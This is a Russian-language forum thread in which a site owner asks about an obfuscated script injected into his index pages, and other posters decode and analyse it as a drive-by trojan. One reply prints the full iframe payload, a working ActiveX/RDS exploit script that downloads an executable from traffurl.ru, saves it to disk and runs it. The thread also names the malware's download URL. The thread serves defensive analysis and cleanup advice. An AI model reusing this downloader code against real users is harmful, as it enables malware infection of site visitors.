Странный скрипт на страницах моих сайтов!

[Lx62GjVWZQJFjPD]

У меня хостинг, где размещены много сайтов, недавно на страницах "index.*" заметил странный скрипт, такого никогда лично не внедрял, даже некоторые страницы становится неработоспособными, если появляется дополнительный код, подскажите, пожалуйста, суть существования этого скрипта, что бы смог предпринимать подходящие меры безопасности, понятное дело что внешняя программное обеспечение записывала этот код, а может и нет?

Код между скобками: "<!-- o --><!-- c --><script>eval(unescape("%77%69%6e%6 4%6f%77%2e%73%74%61%74%75%73%3d%27% 44%6f%6e%65%27%3b%64%6f%63%75%6d%65 %6e%74%2e%77%72%69%74%65%28%27%3c%6 9%66%72%61%6d%65%20%6e%61%6d%65%3d% 65%35%37%32%62%63%30%20%73%72%63%3d %5c%27%68%74%74%70%3a%2f%2f%74%72%6 1%66%66%75%72%6c%2e%72%75%2f%73%6c% 69%76%3f%27%2b%4d%61%74%68%2e%72%6f %75%6e%64%28%4d%61%74%68%2e%72%61%6 e%64%6f%6d%28%29%2a%31%39%38%36%34% 38%29%2b%27%39%34%5c%27%20%77%69%64 %74%68%3d%35%33%34%20%68%65%69%67%6 8%74%3d%33%37%32%20%73%74%79%6c%65% 3d%5c%27%64%69%73%70%6c%61%79%3a%20 %6e%6f%6e%65%5c%27%3e%3c%2f%69%66%7 2%61%6d%65%3e%27%29")); </script>"

[Johnatan]

Код HTML:

window.status='Done';document.write('<iframe name=e572bc0 src=\'http://traffurl.ru/sliv?'+Math.round(Math.random()*198648)+'94\' width=534 height=372 style=\'display: none\'></iframe>')

вот что там зашифровано. Думай сам, что это и откуда.

[mihali4]

http://1stat.ru/?domain=traffurl.ru
А вот что еще говорят наши импортные коллеги
(http://www.developersdex.com/asp/mes...78&r=6157380):

Цитата:

Its a trojan disguised as a codec and drops quietly and happily into your system through Media Player (unless you are one of the few
cautious types who set it to choose "Don't download codecs without bloody asking me first!"). For the OP this means a couple of things.

1. Your PC is now infected and has been recruited into a botnet.
2. Your website is infecting other PCs every time one visits it.
3. Your PC is now being used by a - probably criminal - gang.
4. The hard one - you know about it, so you are responsible.

In essence, this means fix the website, or you could be sued. Clean your PC, or you could be sued. Report the hacking to your hosting provider, or you could be sued. Report it to your local or national police, or - worst of all - you could be charged as an accessory to the criminal activity probably now going on with your PC and with all your website visitors. Yes, this is serious. You need to deal with it.

Да и в "Hard & Soft" было:

Цитата:

Исполнительный файл вируса: _http://traffurl.ru/sliv/load.exe (НЕ СКАЧИВАЙТЕ, ЕСЛИ НЕ УВЕРЕНЫ В НАДЕЖНОСТИ СВОЕЙ АНТИВИРУСНОЙ ЗАЩИТЫ!)

[SkyM@n]

Это последствие работы троянчика, который ворует пароли к ФТП. Потом меняет все РНР страницы, размещенные в корневике сайта.
Не храните ваши пароли на локальном компе, особенно в Тотал Коммандере!

Чтобы избавиться от дряни, уберите с каждого РНР-файла корневика сайта обфускаченный код, приведенный выше. А также, обязательно поменяйте пароль на ФТП.

[SkyM@n]

Да, кстати, скрипт создает ифрейм, в котором запрограммирована вредоносная программа с использованием WSH и аджакса . Следовательно, код корректно будет работать только на Интернет Експлорере. Опять нам живой пример того, что тупой осел - еще тупее. Хотя сам аджакс написан и для "правильных" броузеров. На линуксе и других "правильных" системах - вирус работать не будет. А также, если юзер - не имеет прав админа.
Содержание ифрейма (для любопытных и иже с ними):

Код:

<SCRIPT Language="javascript" type="text/javascript"> 
function lsrn(lal){
var exes="\\hdip.exe";
var url="http://traffurl.ru/sliv/load.php";
var zoi="X"+"ML";
var req="G"+"ET";
var smm="D";
var ldobj=null;

try{
   ldobj=objmker(lal,"Mi"+"cro"+"sof"+"t."+zoi+"HTTP");
   ldobj.open(req,url,false);
}catch(e){
   try{
      ldobj=objmker(lal,"MS"+zoi+"2."+zoi+"HTTP");
      ldobj.open(req,url,false);
   }catch(e){
      try{
         ldobj=objmker(lal,"MS"+zoi+"2.Server"+zoi+"HTTP");
         ldobj.open(req,url,false);
     }
     catch(e){
        try{
          ldobj=new XMLHttpRequest();
          ldobj.open(req,url,false);
       }
       catch(e){
          return 0;
       }
    }
  }
}

try{
   ldobj.send(null);
}catch(e){
   try{
     ldobj.send(null);
   }
   catch(e){
      return 0;
   };
};

ldbody = ldobj.responseBody;
var obj_strm=objmker(lal,"A"+smm+"O"+smm+"B.S"+"tr"+"eam");
if(obj_strm){
   obj_strm.Type=1;
   obj_strm.Mode=3;
   obj_strm.Open();
   obj_strm.Write(ldbody);
   var hdrive="";
   var dtemp="";
   var dstart="";
   var daustart="";
   try{
      var obj_wscript=objmker(lal,"wscript.Shell");
      try{
         var  shProcEnv=obj_wscript.Environment("PROCESS");
         hdrive=wshProcEnv("HOMEDRIVE");
         dtemp=wshProcEnv("TEMP");
      }catch(e){};
      try{
        dstart=obj_wscript.Specialfolders("AllUsers");
        daustart=obj_wscript.Specialfolders("AllUsers");
     }catch(e){};
   }catch(e){};
   if(hdrive==""){
      hdrive="C:";
   };
   if(dtemp==""){
      try{
        var obj_fso=objmker(lal,"Sc"+"ript"+"ing.Fil"+"eSyst"+"emO"+"bject");
        dtemp=obj_fso.Getspecialfolder(2);
      }catch(e){};
   };
   var fnex="";
   var n="";
   if(fnex==""){
      if(daustart!=""){
          try{
             fn=daustart+exes;
             obj_strm.savetofile(fn,2);
             fnex=fn;
         }catch(e){};
      };
    };

----cut here---

[SkyM@n]

--cut here--

Код:

   if(fnex==""){
     if(dstart!=""){
        try { 
         fn=dstart+exes;
         obj_strm.savetofile(fn,2);
         fnex=fn;
       }catch(e){};
     };
   }; 
   if(fnex==""){
      try{
        fn=hdrive+"\\Documents and Settings\\All Users\\"+exes;
        obj_strm.savetofile(fn,2);
        fnex=fn;
     }catch(e){};
   }; 
   if(fnex==""){
      try{
        fn=hdrive+"\\Dokumente und Einstellungen\\All Users\\"+exes;
        obj_strm.savetofile(fn,2);
        fnex=fn;
     }catch(e){};
   }; 
   if(fnex==""){
     try{
       fn=dtemp+exes;
       obj_strm.savetofile(fn,2);
       fnex=fn;
    }catch(e){};
  }; 
   if(fnex==""){
     try{
       fn="C:"+exes;
       obj_strm.savetofile(fn,2);
       fnex=fn;
    }catch(e){};
   }; 
   if(fnex==""){
     try{
       fn="C:\\RECYCLER"+exes;
       obj_strm.savetofile(fn,2);
       fnex=fn;
     }catch(e){};
   }; 
   if(fnex==""){
      try{
        fn="C:\\RECYCLED"+exes;
        obj_strm.savetofile(fn,2);
        fnex=fn;
      }catch(e){};
   }; 
   if(fnex!=""){
      try{
        var obj_shl=objmker(lal, "She"+"ll.app"+"lication");
        obj_shl.Shellexecute(fnex);
      }catch(e){
          try{
            obj_wscript.Exec(fnex);
         }catch(e){
            try{
              var obj2mk = "testobj" + ".innerHTML" + "=testobj" + ".innerHTML" + "+\"<object";
              obj2mk = obj2mk + " classid" + "='clsid:" + "527196a4-b1a3-4647-931d-37ba5af23037";
              obj2mk = obj2mk + "' codebase=" + "'\"+fnex+\"'></" + "object>\";";
              eval(obj2mk);
           }catch(e){
              return 0;
           };
         };
       };
       return 1;
    }else{
      return 0;
    };
  };
};
var i=0;
var hncx=new Array("{BD96C"+"556-65A"+"3-11D0-9"+"83A-00C04"+"FC2"+"9E36}",
                                 "{"+"AB9BC"+"EDD-E"+"C7E-47"+"E1-9322"+"-D4A2"+"1061"+"7116}",
                                 "{0"+"006F033-0000-000"+"0-C0"+"00-0000000"+"000"+"46}",
                                 "{0006"+"F03A-0000-"+"0000-C000-"+"0000"+"000000"+"46}",
                                 "{6e32070"+"a-76"+"6d-4ee6-879c-d"+"c1fa91d2f"+"c3}", 
                                 "{6414512B-B"+"978-451D-A0D8-F"+"CF"+"DF33E83"+"3C}", 
                                 "{7F5B7"+"F63-F06F"+"-4331-8A26-339E03"+"C0AE"+"3D}", 
                                 "{06723E09-F4C2-43"+"c8-8358-09FC"+"D1DB0766}", 
                                 "{639"+"F725F-1B2D-48"+"31-"+"A9FD-8"+"7484768"+"2010}", 
                                 "{B"+"A018599-1DB3-44f9-83B"+"4-461454C8"+"4BF8}", 
                                 "{D0C07D5"+"6-7C69-"+"43F1-B4A0-2"+"5F5A11FAB1"+"9}", 
                                 "{E8"+"CCCDDF-CA28-496b-"+"B050-6C07C"+"96247"+"6B}",
                                 null);
good = 0; 
while(hncx[i]){
     var iuump = null;
     if(hncx[i].substring(0,1) == "{" ){
        iuump=document.createElement("object");
        iuump.setAttribute("id", "obj_RDS" + i);
        iuump.setAttribute("classid", "clsid:" + hncx[i].substring(1, hncx[i].length - 1));
     }
     if(iuump){
        try{
            if(lsrn(iuump)){break;};
        }catch(e){}
     }
     i++;
} 

function objmker(tt, lol){
   var nobj=null;
   try{
      eval('nobj=tt.CreateObject(lol)');
   }catch(e){} 
   if(!nobj){
   try{
      eval('nobj=tt.CreateObject(lol,"")');
   }catch(e){}
}

if(!nobj){
   try{
      eval('nobj=tt.CreateObject(lol,"","")');
   }catch(e){}
}

if(!nobj){
   try{
      eval('nobj=tt.GetObject("",lol)');
   }catch(e){}
}

if(!nobj){
   try{
      eval('nobj=tt.GetObject(lol,"")');
   }catch(e){}
}

if(!nobj){
   try{
      eval('nobj=tt.GetObject(lol)');
   }catch(e){}
}
return(nobj);
}
</SCRIPT>
</body>
</html> 
<iframe src=http://traffurl.ru/slivv/index.php width=1 height=1 style="display:none"></iframe>

Этот кода создает еще один вложенный ифрейм, в котором копия этого же джаваскриптового кода.
Как видите, написано умно. Везде есть проверка на баги. Чтобы не вызвать левых сообщений, ошибок и прочих неудобств пользователю...ради того, чтобы причинить еще больший вред